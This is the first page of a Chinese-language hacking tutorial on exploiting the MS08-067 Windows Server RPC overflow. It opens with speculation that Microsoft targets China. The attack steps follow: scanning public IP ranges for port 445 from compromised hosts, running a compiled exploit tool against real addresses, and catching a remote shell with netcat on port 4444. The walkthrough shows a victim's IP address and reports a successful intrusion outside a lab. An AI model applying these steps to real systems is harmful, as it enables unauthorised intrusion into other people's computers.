微軟的正版驗證機會出來以后沒有多久,就爆出針對臺灣和簡體中文版本的MS08067漏洞,這個時候微軟主動爆出這個號稱比沖擊波還要厲害的漏洞,是否針對我國,很多人都在懷疑,萬事講究證據,沒有證據,也只能猜測!不過武器在別人手中,想怎么玩你,就怎么玩你!很多專家也對微軟提供的更新中是否保護木馬,諸如下載者等等表示懷疑和關注!網上也有說的微軟是中國最大的黑客,就筆者個人經驗來說,現在的Linux操作系統完全能夠勝任常用的辦公功能。閑話少說,俺給大家帶來最新的MS08067遠程溢出漏洞實戰分析。
(一)MS08067漏洞描述
MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼,此漏洞可用于進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。防火墻最佳做法和標準的默認防火墻配置有助于保護網絡資源免受從企業外部發起的攻擊,默認情況下能建立空連接。
MS08-067比沖擊波還要厲害,通過本人的實際測試,掃描一個網段,至少數百臺存在該漏洞的計算機,只要是中文版本的操作系統,Vista除外,毫無幸免!
(二)MS08067遠程漏洞實際利用
1.掃描445端口
關于MS08067漏洞目前還沒有特別全面的分析報告,據相關資料稱,只要掃描到開放139、445端口,就有可能利用該漏洞來實施遠程溢出。因此首先我們使用工具軟件掃描445端口,掃描的工具很多,我給大家介紹兩種在DOS下面掃描的工具,一個是sfind.exe另外一個是s.exe,前者命令為“sfind –p 445 ip地址1 ip地址2”,例如掃描“sfind –p 445 218.99.0.1 218.99.0.255”;另外一個的使用的推薦命令格式為“s tcp 218.99.0.1 218.99.255.255 445 512 /save”,兩個小軟件掃描完成后自動保存結果,可以在肉雞后臺上進行工作,掃描完成后上去看結果即可。我采用sfind.exe對附近計算機進行445端口掃描,如圖1所示,一共出來7臺計算機,如果是大范圍掃描,推薦使用后一種掃描軟件,掃描速度快。
![]() |
圖1 使用sfind掃描445端口 |
說明:
(1)由于掃描出來的結果比較少,所以直接看就可以了。如果結果比較多,可以到sfind掃描目錄下直接打開sfind.txt掃描結果。
2.使用MS08067溢出工具對結果進行溢出嘗試
將獲取的代碼在VC中進行編譯,將生成的程序重新命名為“MS0867”,然后打開DOS操作界面,并將MS08067.exe程序復制到當前操作目錄(今天有人問我,為什么直接雙擊MS08067.exe程序,無任何反應,唉,暈!),直接輸入程序名稱,即可出現具體的使用方式,MS08067漏洞的使用方法為“MS08067 IP地址”,IP地址為存在該漏洞的服務器或者個人計算機的IP地址。輸入存在可能存在該漏洞的IP地址218.*.*.*,結果顯示為“SMB Connect OK! Maybe Patched!”如圖2所示。
![]() |
圖2 對存在漏洞的服務器進行溢出 |
注意:
(1)在溢出過程還有多種提示例如“Make SMB Connection error:64”
(2)出現“Maybe Patched!”提示的計算機也可能溢出成功。
(3)僅僅對臺灣和簡體中文版本有效,對其他版本的服務器及時存在445漏洞也無法溢出,原因是操作系統溢出點內存地址不同。
3.監聽“4444”端口
在執行掃描的計算機上使用nc監聽4444端口,具體命令為“nc –vv ip地址 4444”,例如“nc –vv 218.69.*.2 4444”,一次不成功的溢出顯示結果為“nc -vv 218.22.27.71 4444
Warning: forward host lookup failed for 71.27.22.218.broad.static.hf.ah.cndata.com: h_errno 11002: TRY_AGAIN71.27.22.218.broad.static.hf.ah.cndata.com [218.22.27.71] 4444 (?): TIMEDOUT sent 0, rcvd 0: NOTSOCK”,這說明218.22.27.71可能已經安裝補丁、防火墻禁止對外進行連接等情況,導致溢出不成功。
說明:
在MS08067中可以定制監聽端口,不過那個端口需要在源程序中定制。
4.繼續進行溢出
換另外一個IP地址執行溢出,重新監聽該IP地址,如圖3所示,出來我們比較熟悉的反彈Shell串口,終于看到了希望,我在本地虛擬機上執行了多次測試,都未成功,但在實際環境中卻測試成功。
![]() |
圖3 溢出成功 |
共4頁: 1 [2] [3] [4] 下一頁 | ||||||
|